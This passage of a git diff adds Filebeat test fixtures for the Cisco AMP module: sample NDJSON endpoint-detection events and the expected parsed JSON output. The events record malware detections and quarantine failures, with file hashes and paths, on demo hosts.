Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064602","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":798000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064601","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":767000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064598","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":751000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064600","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":735000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064599","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":423000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064597","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\WINDOWS\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"},"parent":{"process_id":6404,"disposition":"Malicious","file_name":"mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":377000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064596","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} \ No newline at end of file diff --git a/x-pack/filebeat/module/cisco/amp/test/cisco_amp4.ndjson.log-expected.json b/x-pack/filebeat/module/cisco/amp/test/cisco_amp4.ndjson.log-expected.json new file mode 100644 index 00000000000..fb066a1b337 --- /dev/null +++ b/x-pack/filebeat/module/cisco/amp/test/cisco_amp4.ndjson.log-expected.json @@ -0,0 +1,3294 @@ +[ + { + "@timestamp": "2021-01-14T21:17:16.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "38:1e:eb:ba:2c:15" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.6A37D750F0-100.SBX.TG", + "cisco.amp.detection_id": "6508397899087347713", + "cisco.amp.event_type_id": 553648147, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "38:1e:eb:ba:2c:15" + ], + "cisco.amp.timestamp_nanoseconds": 295927133, + "event.action": "Retrospective Detection", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6508397899087348000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.md5": "41476df3138717868118d8542cf3d1d6", + "file.hash.sha1": "5ca4bef8de6def53519d4b22632675bb4c1e470b", + "file.hash.sha256": "6a37d750f02de99767770a2d1274c3a4e0259e98d38bd8a801949ae3972eef86", + "file.name": "resume.exe", + "file.path": "\\\\?\\C:\\Users\\johndoe\\Desktop\\resume.exe", + "fileset.name": "amp", + "host.hostname": "Demo_AMP", + "host.name": "Demo_AMP", + "host.os.family": "windows", + "host.os.platform": "windows", + "input.type": "log", + "log.offset": 0, + "related.hash": [ + "6a37d750f02de99767770a2d1274c3a4e0259e98d38bd8a801949ae3972eef86", + "41476df3138717868118d8542cf3d1d6", + "5ca4bef8de6def53519d4b22632675bb4c1e470b" + ], + "related.hosts": [ + "Demo_AMP" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T20:38:26.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "02:2f:e0:10:03:5d" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.E4FCCBFA69-95.SBX.TG", + "cisco.amp.event_type_id": 1107296272, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "02:2f:e0:10:03:5d" + ], + "cisco.amp.timestamp_nanoseconds": 844899579, + "event.action": "Executed malware", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 14930696955218, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "event.start": "2021-01-14T20:38:26.000Z", + "file.hash.sha256": "e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_3", + "host.name": "Demo_Qakbot_3", + "input.type": "log", + "log.offset": 1313, + "process.hash.sha256": "e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014", + "related.hash": [ + "e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014" + ], + "related.hosts": [ + "Demo_Qakbot_3" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T20:18:05.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "02:2f:e0:10:03:5d" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6412680266518626319", + "cisco.amp.error.description": "Object name not found", + "cisco.amp.error.error_code": 3221225524, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "02:2f:e0:10:03:5d" + ], + "cisco.amp.timestamp_nanoseconds": 587000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6412680266518626000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_3", + "host.name": "Demo_Qakbot_3", + "input.type": "log", + "log.offset": 2612, + "related.hash": [ + "e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014" + ], + "related.hosts": [ + "Demo_Qakbot_3" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T20:18:05.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "02:2f:e0:10:03:5d" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6412680266518626317", + "cisco.amp.error.description": "Delete pending", + "cisco.amp.error.error_code": 3221225558, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "02:2f:e0:10:03:5d" + ], + "cisco.amp.timestamp_nanoseconds": 494000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6412680266518626000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_3", + "host.name": "Demo_Qakbot_3", + "input.type": "log", + "log.offset": 3794, + "related.hash": [ + "e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014" + ], + "related.hosts": [ + "Demo_Qakbot_3" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T20:18:05.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "02:2f:e0:10:03:5d" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.E4FCCBFA69-95.SBX.TG", + "cisco.amp.detection_id": "6412680266518626318", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "02:2f:e0:10:03:5d" + ], + "cisco.amp.timestamp_nanoseconds": 572000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6412680266518626000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "b5ede95ec8bc4ad6984758be42b152bd", + "file.hash.sha1": "f504774b72acfb23a46217aec9c6559fd7e4df64", + "file.hash.sha256": "e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014", + "file.name": "QuotaGroup.exe", + "file.path": "\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\QuotaGroup\\QuotaGroup.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_3", + "host.name": "Demo_Qakbot_3", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 6511, + "related.hash": [ + "e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014", + "b5ede95ec8bc4ad6984758be42b152bd", + "f504774b72acfb23a46217aec9c6559fd7e4df64" + ], + "related.hosts": [ + "Demo_Qakbot_3" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T20:18:05.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "02:2f:e0:10:03:5d" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.E4FCCBFA69-95.SBX.TG", + "cisco.amp.detection_id": "6412680266518626316", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "02:2f:e0:10:03:5d" + ], + "cisco.amp.timestamp_nanoseconds": 478000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6412680266518626000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "b5ede95ec8bc4ad6984758be42b152bd", + "file.hash.sha1": "f504774b72acfb23a46217aec9c6559fd7e4df64", + "file.hash.sha256": "e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014", + "file.name": "28242311.exe", + "file.path": "\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\28242311.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_3", + "host.name": "Demo_Qakbot_3", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 9339, + "related.hash": [ + "e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014", + "b5ede95ec8bc4ad6984758be42b152bd", + "f504774b72acfb23a46217aec9c6559fd7e4df64" + ], + "related.hosts": [ + "Demo_Qakbot_3" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T19:29:11.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419303574240493599", + "cisco.amp.error.description": "Object name not found", + "cisco.amp.error.error_code": 3221225524, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 664000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419303574240494000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "2ca2d550e603d74dedda03156023135b38da3630cb014e3d00b1263358c5f00d", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 12926, + "related.hash": [ + "2ca2d550e603d74dedda03156023135b38da3630cb014e3d00b1263358c5f00d" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T19:29:11.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419303574240493597", + "cisco.amp.error.description": "Object name not found", + "cisco.amp.error.error_code": 3221225524, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 664000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419303574240494000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "4a468603fdcb7a2eb5770705898cf9ef37aade532a7964642ecd705a74794b79", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 14119, + "related.hash": [ + "4a468603fdcb7a2eb5770705898cf9ef37aade532a7964642ecd705a74794b79" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T19:29:11.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419303569945526295", + "cisco.amp.error.description": "Delete pending", + "cisco.amp.error.error_code": 3221225558, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 664000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419303574240494000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 15312, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T19:29:11.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419303569945526294", + "cisco.amp.error.description": "Delete pending", + "cisco.amp.error.error_code": 3221225558, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 664000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419303574240494000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 16498, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T19:29:11.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419303569945526293", + "cisco.amp.error.description": "Delete pending", + "cisco.amp.error.error_code": 3221225558, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 664000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419303574240494000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 17684, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T19:29:11.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419303569945526292", + "cisco.amp.error.description": "Delete pending", + "cisco.amp.error.error_code": 3221225558, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 664000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419303574240494000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 18870, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T19:29:11.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419303569945526291", + "cisco.amp.error.description": "Delete pending", + "cisco.amp.error.error_code": 3221225558, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + 